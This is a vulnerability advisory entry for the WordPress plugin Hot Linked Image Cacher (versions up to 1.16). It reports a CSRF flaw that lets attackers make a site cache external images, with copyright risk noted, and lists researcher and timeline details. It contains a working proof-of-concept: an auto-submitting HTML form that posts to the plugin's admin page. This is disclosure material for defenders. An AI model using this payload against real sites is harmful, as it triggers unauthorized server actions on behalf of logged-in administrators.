WordPress Plugin Vulnerabilities
Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF
Description
The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).
Proof of Concept
<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST"> <input type="text" name="domains[]" value="example.com"> <input type="text" name="urlmethod" value="curl"> <input type="text" name="postid" value="enter a post id here"> <input type="text" name="step" value="3"> <input type="text" name="Submit" value="Cache These Images »"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-17 (about 2 years ago)
Added
2022-05-17 (about 2 years ago)
Last Updated
2022-05-18 (about 2 years ago)